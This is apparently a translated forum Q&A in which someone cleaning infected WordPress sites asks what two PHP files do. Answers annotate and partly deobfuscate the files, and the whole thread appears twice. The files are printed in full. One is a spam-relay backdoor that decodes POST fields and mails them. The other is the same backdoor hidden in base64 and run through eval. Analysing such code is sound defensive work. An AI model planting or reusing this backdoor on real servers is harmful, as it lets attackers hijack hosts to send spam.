PHP 攻击服务器,这段代码在做什么?
PHP attack on server, what is this code doing?
所以我一直在帮助那些在使用 wordpress 的 godaddy 服务器上遭受恶意软件攻击的人。我想我已经删除了导致问题的代码,但我只是好奇这个 php 在做什么,它似乎循环遍历存储在 POST 中的变量并试图解码任何信息,然后通过电子邮件发送...有人可以帮助我理解这一点吗?干杯
<?php
$data = array('');
foreach ($_POST as $key => $value) {
array_push($data, $value);
}
$jxWnO = stripslashes(base64_decode(base64_decode($data[1] )));
$e2WPWta = stripslashes(base64_decode(base64_decode($data[2] )));
$hwrDZxfxhl = stripslashes(base64_decode(base64_decode($data[3] )));
$JQiQiWf3Pg = stripslashes(base64_decode(base64_decode($data[4] )));
$Fr2ZEIZYuKj = mail(stripslashes($jxWnO), stripslashes($e2WPWta), stripslashes($hwrDZxfxhl), stripslashes($JQiQiWf3Pg));
if ($Fr2ZEIZYuKj) {
echo $Fr2ZEIZYuKj;
} else {
echo '99';
}
?>
然后在一个单独的文件中:
<?php $code=base64_decode("XCRfZjJkZGFkYjBkZDUwNjdiODNjMjA0NDk2NmMwNDFiYWMgPSBhcnJheSgnJyk7IFx4NjZceDZGXHg3Mlx4NjVceDYxXHg2M1x4NjggKFwkXHg1Rlx4NTBceDRGXHg1M1x4NTQgYXMgXCRfN2Q1MDQ1ZTBmNTU5ODI4MzY4ODhiOGVmN2U4M2QzNzBlOTlmMjU4NGQxNzNhNmQ0MDRkNTQzNWQ1NWE3OGQ1NzBhNjk4ZWFhNDdmNDQ4NmJhNGVjYTg1MGJhMjgxMjQ3MmZkMjc0NmUzMzQ4MDI0NzY2ZWI5MzNlOTFjYTE5NWMgPT4gXCRfYzMxMGE5MGI0NjcxNGZhOTYzMzk0MTkwYjEyYThjNjFhYWFlNDk1Y2RhODE4ZTA5OWVkNmExYmUpIHtceDYxXHg3Mlx4NzJceDYxXHg3OVx4NUZceDcwXHg3NVx4NzNceDY4KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjLCBcJF9jMzEwYTkwYjQ2NzE0ZmE5NjMzOTQxOTBiMTJhOGM2MWFhYWU0OTVjZGE4MThlMDk5ZWQ2YTFiZSk7fSBcJF9jNTNmOTg1NjJiYjM2M2RhNzE5YjBjNDQ2ZGQ4YzBhMTVjZWJmNDVhID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1sxXSApKSk7IFwkXzhkMzQxZGM0ZjliZDM1YzdlOTQ1YmIxODJjM2Q0YzY4MjA0NTBhZWFmNGM2N2NmYThjYTkyZjBhOGFjOTI5MTEzZDdjZTRiYTA4NmE5ZGVmMzg5M2VlMjYwODgyNjUxOWFhYzI4YmIxZDM5NzZhMzZkZDU1NTBhMGVmZjdjNTYzID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1syXSApKSk7IFwkX2RkYmU1ZDM5ID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1szXSApKSk7IFwkXzAyMDNhYzU4NjU5YTllNTAxNDA4YjkxZGYyYzliNjFhMTFiM2EzODNiY2IzZGEwYmJmNTJhMTdiYTAwZDkwODggPSBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShceDYyXHg2MVx4NzNceDY1XHgzNlx4MzRceDVGXHg2NFx4NjVceDYzXHg2Rlx4NjRceDY1KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjWzRdICkpKTsgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSA9IFx4NkRceDYxXHg2OVx4NkMoXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFwkX2M1M2Y5ODU2MmJiMzYzZGE3MTliMGM0NDZkZDhjMGExNWNlYmY0NWEpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfOGQzNDFkYzRmOWJkMzVjN2U5NDViYjE4MmMzZDRjNjgyMDQ1MGFlYWY0YzY3Y2ZhOGNhOTJmMGE4YWM5MjkxMTNkN2NlNGJhMDg2YTlkZWYzODkzZWUyNjA4ODI2NTE5YWFjMjhiYjFkMzk3NmEzNmRkNTU1MGEwZWZmN2M1NjMpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfZGRiZTVkMzkpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfMDIwM2FjNTg2NTlhOWU1MDE0MDhiOTFkZjJjOWI2MWExMWIzYTM4M2JjYjNkYTBiYmY1MmExN2JhMDBkOTA4OCkpOyBceDY5XHg2NiAoXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSl7IFx4NjVceDYzXHg2OFx4NkYgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZTt9IGVsc2UgeyBceDY1XHg2M1x4NjhceDZGICdceDM5XHgzOSc7fQ=="); eval("return eval(\"$code\");") ?>
重命名变量以便于阅读...
<?php
$data = array('');
// Takes a post submitted to this url
foreach ($_POST as $key => $value) {
array_push($data, $value);
}
// For each post form field in the array it adds them to vars after decoding them twice.
$sVar1 = stripslashes(base64_decode(base64_decode($data[1] )));
$sVar2 = stripslashes(base64_decode(base64_decode($data[2] )));
$sVar3 = stripslashes(base64_decode(base64_decode($data[3] )));
$sVar4 = stripslashes(base64_decode(base64_decode($data[4] )));
// Then it emails the data submitted to the email contained in var1
// bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )
$sVar5 = mail(stripslashes($sVar1), stripslashes($sVar2), stripslashes($sVar3), stripslashes($sVar4));
// Outputs mail return function (success/error(99)) TRUE | FALSE
if ($sVar5) {
// If TRUE prints var5
echo $sVar5;
} else {
// If does not email successfully prints 99
echo '99';
}
这很有趣 - 你能详细说明这两个 files/code 片段是如何相互关联和相互作用的吗?
第二个脚本在解码后混淆程度略有降低:
"$var1 = array('');
\x66\x6F\x72\x65\x61\x63\x68 ($\x5F\x50\x4F\x53\x54 as $var2 => $var3) {\x61\x72\x72\x61\x79\x5F\x70\x75\x73\x68($var1, $var3);}
$var7 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65($var1[1] )));
$var4 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65($var1[2] )));
$var8 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65($var1[3] )));
$var5 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65($var1[4] )));
$var6 = \x6D\x61\x69\x6C(\x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73($var7), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73($var4), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73($var8), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73($var5));
\x69\x66 ($var6){ \x65\x63\x68\x6F $var6;} else { \x65\x63\x68\x6F '\x39\x39';}"
所以我一直在帮助那些在使用 wordpress 的 godaddy 服务器上遭受恶意软件攻击的人。我想我已经删除了导致问题的代码,但我只是好奇这个 php 在做什么,它似乎循环遍历存储在 POST 中的变量并试图解码任何信息,然后通过电子邮件发送...有人可以帮助我理解这一点吗?干杯
<?php
$data = array('');
foreach ($_POST as $key => $value) {
array_push($data, $value);
}
$jxWnO = stripslashes(base64_decode(base64_decode($data[1] )));
$e2WPWta = stripslashes(base64_decode(base64_decode($data[2] )));
$hwrDZxfxhl = stripslashes(base64_decode(base64_decode($data[3] )));
$JQiQiWf3Pg = stripslashes(base64_decode(base64_decode($data[4] )));
$Fr2ZEIZYuKj = mail(stripslashes($jxWnO), stripslashes($e2WPWta), stripslashes($hwrDZxfxhl), stripslashes($JQiQiWf3Pg));
if ($Fr2ZEIZYuKj) {
echo $Fr2ZEIZYuKj;
} else {
echo '99';
}
?>
然后在一个单独的文件中:
<?php $code=base64_decode("XCRfZjJkZGFkYjBkZDUwNjdiODNjMjA0NDk2NmMwNDFiYWMgPSBhcnJheSgnJyk7IFx4NjZceDZGXHg3Mlx4NjVceDYxXHg2M1x4NjggKFwkXHg1Rlx4NTBceDRGXHg1M1x4NTQgYXMgXCRfN2Q1MDQ1ZTBmNTU5ODI4MzY4ODhiOGVmN2U4M2QzNzBlOTlmMjU4NGQxNzNhNmQ0MDRkNTQzNWQ1NWE3OGQ1NzBhNjk4ZWFhNDdmNDQ4NmJhNGVjYTg1MGJhMjgxMjQ3MmZkMjc0NmUzMzQ4MDI0NzY2ZWI5MzNlOTFjYTE5NWMgPT4gXCRfYzMxMGE5MGI0NjcxNGZhOTYzMzk0MTkwYjEyYThjNjFhYWFlNDk1Y2RhODE4ZTA5OWVkNmExYmUpIHtceDYxXHg3Mlx4NzJceDYxXHg3OVx4NUZceDcwXHg3NVx4NzNceDY4KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjLCBcJF9jMzEwYTkwYjQ2NzE0ZmE5NjMzOTQxOTBiMTJhOGM2MWFhYWU0OTVjZGE4MThlMDk5ZWQ2YTFiZSk7fSBcJF9jNTNmOTg1NjJiYjM2M2RhNzE5YjBjNDQ2ZGQ4YzBhMTVjZWJmNDVhID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1sxXSApKSk7IFwkXzhkMzQxZGM0ZjliZDM1YzdlOTQ1YmIxODJjM2Q0YzY4MjA0NTBhZWFmNGM2N2NmYThjYTkyZjBhOGFjOTI5MTEzZDdjZTRiYTA4NmE5ZGVmMzg5M2VlMjYwODgyNjUxOWFhYzI4YmIxZDM5NzZhMzZkZDU1NTBhMGVmZjdjNTYzID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1syXSApKSk7IFwkX2RkYmU1ZDM5ID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1szXSApKSk7IFwkXzAyMDNhYzU4NjU5YTllNTAxNDA4YjkxZGYyYzliNjFhMTFiM2EzODNiY2IzZGEwYmJmNTJhMTdiYTAwZDkwODggPSBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShceDYyXHg2MVx4NzNceDY1XHgzNlx4MzRceDVGXHg2NFx4NjVceDYzXHg2Rlx4NjRceDY1KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjWzRdICkpKTsgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSA9IFx4NkRceDYxXHg2OVx4NkMoXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFwkX2M1M2Y5ODU2MmJiMzYzZGE3MTliMGM0NDZkZDhjMGExNWNlYmY0NWEpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfOGQzNDFkYzRmOWJkMzVjN2U5NDViYjE4MmMzZDRjNjgyMDQ1MGFlYWY0YzY3Y2ZhOGNhOTJmMGE4YWM5MjkxMTNkN2NlNGJhMDg2YTlkZWYzODkzZWUyNjA4ODI2NTE5YWFjMjhiYjFkMzk3NmEzNmRkNTU1MGEwZWZmN2M1NjMpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfZGRiZTVkMzkpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfMDIwM2FjNTg2NTlhOWU1MDE0MDhiOTFkZjJjOWI2MWExMWIzYTM4M2JjYjNkYTBiYmY1MmExN2JhMDBkOTA4OCkpOyBceDY5XHg2NiAoXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSl7IFx4NjVceDYzXHg2OFx4NkYgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZTt9IGVsc2UgeyBceDY1XHg2M1x4NjhceDZGICdceDM5XHgzOSc7fQ=="); eval("return eval(\"$code\");") ?>
重命名变量以便于阅读...
<?php
$data = array('');
// Takes a post submitted to this url
foreach ($_POST as $key => $value) {
array_push($data, $value);
}
// For each post form field in the array it adds them to vars after decoding them twice.
$sVar1 = stripslashes(base64_decode(base64_decode($data[1] )));
$sVar2 = stripslashes(base64_decode(base64_decode($data[2] )));
$sVar3 = stripslashes(base64_decode(base64_decode($data[3] )));
$sVar4 = stripslashes(base64_decode(base64_decode($data[4] )));
// Then it emails the data submitted to the email contained in var1
// bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )
$sVar5 = mail(stripslashes($sVar1), stripslashes($sVar2), stripslashes($sVar3), stripslashes($sVar4));
// Outputs mail return function (success/error(99)) TRUE | FALSE
if ($sVar5) {
// If TRUE prints var5
echo $sVar5;
} else {
// If does not email successfully prints 99
echo '99';
}
这很有趣 - 你能详细说明这两个 files/code 片段是如何相互关联和相互作用的吗?
第二个脚本在解码后混淆程度略有降低:
"$var1 = array('');
\x66\x6F\x72\x65\x61\x63\x68 ($\x5F\x50\x4F\x53\x54 as $var2 => $var3) {\x61\x72\x72\x61\x79\x5F\x70\x75\x73\x68($var1, $var3);}
$var7 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65($var1[1] )));
$var4 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65($var1[2] )));
$var8 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65($var1[3] )));
$var5 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65($var1[4] )));
$var6 = \x6D\x61\x69\x6C(\x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73($var7), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73($var4), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73($var8), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73($var5));
\x69\x66 ($var6){ \x65\x63\x68\x6F $var6;} else { \x65\x63\x68\x6F '\x39\x39';}"